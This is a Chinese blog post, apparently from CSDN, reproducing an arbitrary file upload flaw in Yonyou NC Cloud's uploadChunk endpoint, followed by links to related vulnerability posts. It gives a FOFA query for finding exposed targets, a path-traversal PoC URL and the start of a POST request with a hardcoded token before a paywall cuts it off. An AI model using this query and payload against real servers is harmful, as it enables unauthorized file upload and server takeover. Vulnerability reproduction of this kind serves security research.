NC Cloud uploadChunk文件上传漏洞复现

最新推荐文章于 2024-06-24 11:34:14 发布
最新推荐文章于 2024-06-24 11:34:14 发布
阅读量396 收藏
点赞数 6
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l1593572468/article/details/134502754
版权
漏洞复现 专栏收录该内容
36 篇文章 15 订阅 ¥9.90 ¥99.00
订阅专栏
本文介绍了用友NC Cloud平台的一个文件上传漏洞,详细阐述了如何通过FOFA搜索到该应用,以及利用POC进行漏洞复现的过程。攻击者可以利用此漏洞上传任意文件。请注意,该文章仅供安全研究,未经授权的利用可能涉及非法行为。
摘要由CSDN通过智能技术生成

简介

NC Cloud是指用友公司推出的大型企业数字化平台。支持公有云、混合云、专属云的灵活部署模式。该产品uploadChunk文件存在任意文件上传漏洞。

漏洞复现

FOFA语法:

app="用友-NC-Cloud"

访问页面如下所示:

POC:/ncchr/pm/fb/attachment/uploadChunk?fileGuid=/../../../nccloud/&chunk=1&chunks=1

POST请求数据包:

accessTokenNcc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ

Content-Length: 149
Co

了解本专栏 订阅专栏 解锁全文
Cheng-Ling
关注
专栏目录
订阅专栏
用友NC Cloud uploadChunk任意文件上传漏洞复现 [附POC]
薛定谔嘚喵博客
11-22 349
用友 NC Cloud,大型企业数字化平台, 聚焦数字化管理、数字化经营、数字化商业,帮助大型企业实现 人、财、物、客的全面数字化,从而驱动业务创新与管理变革,与企业管理者一起重新定义未来的高度。用友NC Cloud uploadChunk接口存在任意文件上传漏洞
漏洞复现用友NC Cloud uploadChunk任意文件上传漏洞
失心少年
11-22 452
用友 NC Cloud,大型企业数字化平台, 聚焦数字化管理、数字化经营、数字化商业,帮助大型企业实现 人、财、物、客的全面数字化,从而驱动业务创新与管理变革,与企业管理者一起重新定义未来的高度。为客户提供面向大型企业集团、制造业、消费品、建筑、房地产、金融保险等14个行业大类,68个细分行业,涵盖数字营销、智能制造、财务共享、数字采购等18大解决方案,帮助企业全面落地数字化。漏洞链接:http://127.0.0.1/ncchr/pm/fb/attachment/uploadChunk?
漏洞复现--用友NC-Cloud uploadChunk 任意文件上传
qq_53003652的博客
10-18 975
NC Cloud是指用友公司推出的大型企业数字化平台。支持公有云、混合云、专属云的灵活部署模式。该产品uploadChunk文件存在任意文件上传漏洞
漏洞复现用友 NC-Cloud uploadChunk 任意文件上传漏洞
凝聚力安全团队
06-24 533
用友 NC-Cloud uploadChunk 接口存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。
用友 NC Cloud jsinvoke 任意文件上传
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
12-01 1092
用友 NC Cloud 中存在 jsinvoke 接口的任意文件上传漏洞,攻击者可以通过利用此漏洞向系统上传任意恶意文件。
用友NC Cloud accept.jsp任意文件上传漏洞
CommputerMac的博客
11-08 496
NC Cloud用友推出的大型企业数字化平台。用友网络科技股份有限公司NC Cloud存在任意文件上传漏洞,攻击者可利用该漏洞获取服务器控制权。
用友NC Cloud importhttpscer 任意文件上传漏洞复现
0xSec
04-05 1004
用友NC Cloud importhttpscer接口处存在任意文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
用友_nccload_uploadchunk文件上传漏洞(含批量验证poc)
weixin_43567873的博客
04-17 292
用友_nccload_uploadchunk文件上传漏洞(含批量验证poc)
用友NC grouptemplet 任意文件上传漏洞复现(XVE-2024-8857)
0xSec
04-24 528
用友 NC grouptemplet 接口处存在任意文件上传漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
用友NC任意文件上传漏洞利用工具
04-14
用友NC任意文件上传漏洞利用工具,用友NC6.5的某个页面,存在任意文件上传漏洞漏洞成因在于上传文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞的远程攻击...
用友NC Cloud存在前台远程命令执行漏洞 附POC软件
nnn2188185的博客
07-24 803
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发用友网络是全球领先的企业与公共组织软件、云服务、金融服务提供商。提供营销、制造、财务、人力等产品与服务,帮助客户实现发展目标,进而推动商业和社会进步。
复现用友NC-Cloud文件上传漏洞_70
fushuang333的博客
04-10 796
复现用友NC-Cloud文件上传漏洞上传文件漏洞的影响可能会非常严重,上传可执行代码可能让攻击者获得服务器控制权。
用友NC Cloud importhttpscer接口存在任意文件上传漏洞
wan___she__pi的博客
04-10 680
用友NC Cloud 是基于云计算技术的企业管理软件。它提供了一系列的功能模块,涵盖了企业的各个管理领域,包括财务管理、人力资源管理、供应链管理、生产制造管理等。通过云端部署,用户可以随时随地通过网络访问和使用这些功能,无需在本地安装软件,企业可以实现信息化管理,提高管理效率和决策能力。它提供了实时数据分析和报表功能,帮助企业监控业务运营情况,及时掌握关键指标和业绩表现。同时,用友NC Cloud 还支持多终端访问,适应各种不同的设备和工作场景,方便用户灵活办公和协作。app="用友-NC-Cloud"
用友NC Cloud importhttpscer接口任意文件上传漏洞
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
04-20 727
接口如果存在任意文件上传漏洞,这是一个严重的安全问题,因为它可能被攻击者利用来执行恶意代码、窃取敏感数据或进行其他形式的攻击。app="用友-NC-Cloud"用友NC Cloud的。用友NC Cloud
用友NC Cloud及YonBIP PMCloudDriveProjectStateServlet JNDI注入漏洞-1day未公开漏洞
weixin_43167326的博客
02-01 702
用友NC是指用友软件股份有限公司开发的一套企业管理软。用友NC系统是一种集成管理企业各项业务流程的信息化解决方案。该系统涵盖了财务、人力资源、供应链管理等多个方面,旨在帮助企业提高运营效率、优化资源利用、提升管理水平。
【HW必备】用友NC-Cloud存在17处漏洞合集
wananxuexihu的博客
06-24 1501
漏洞挖掘是指通过分析软件、系统或网络中存在的安全漏洞来发现并利用这些漏洞漏洞挖掘是信息安全领域的一项重要工作,可以帮助企业和组织提高系统的安全性,避免黑客攻击和数据泄露。漏洞挖掘的流程一般可以概括为以下几个步骤:确定目标:确定要挖掘的软件或系统。这可能是一个应用程序、操作系统、网络设备或其他系统。收集信息:收集有关目标的信息,包括架构、协议、版本和配置等。这些信息可以通过互联网搜索、手动扫描、自动化工具和其他途径获得。分析漏洞:通过手动和自动化技术进行漏洞分析,识别潜在的漏洞类型和攻击面。
漏洞情报-x友NC-Cloud soapFor mat XXE漏洞
qq_52612931的博客
01-11 743
用友NC-Cloud,大型企业数字化平台, 聚焦数字化管理、数字化经营、数字化商业,帮助大型企业实现人、财、物、客的 全面数字化,从而驱动业务创新与管理变革,与企业管理者一起重新定义未来的高度。该系统/uapws/soapFormat.ajax接口存在XXE漏洞,攻击者可以在xml中构造恶意命令,会导致服务器被远控。用友NC Cloud
CNVD-2021-30167 用友NC命令执行漏洞复现
weixin_42345596的博客
07-16 4321
CNVD-2021-30167 用友NC命令执行漏洞复现 1.漏洞描述 该漏洞为远程命令执行漏洞,由于用友NC对外开放了BeanShell接口,攻击者可以在无需经过身份验证的情况下直接访问该接口,并构造恶意数据执行任意命令,攻击成功可获得目标服务器权限。 2.影响版本 用友NC: 6.5 3.复现过程 在线环境 无需登录,通过poc(验证性测试)URL访问测试接口 /servlet/~ic/bsh.servlet.BshServlet 这里本来想上线一下,进去看看,没想到是个国内的服务器,那可不
nc file文件上传漏洞
最新发布
09-06
关于您提到的“nc file文件上传漏洞”,这里可能指的是使用Netcat作为文件传输工具时的安全漏洞问题。通常,通过Netcat进行文件传输可能涉及未加密的数据传输,这可能会导致安全风险,比如数据泄漏或中间人攻击。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cheng-Ling

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值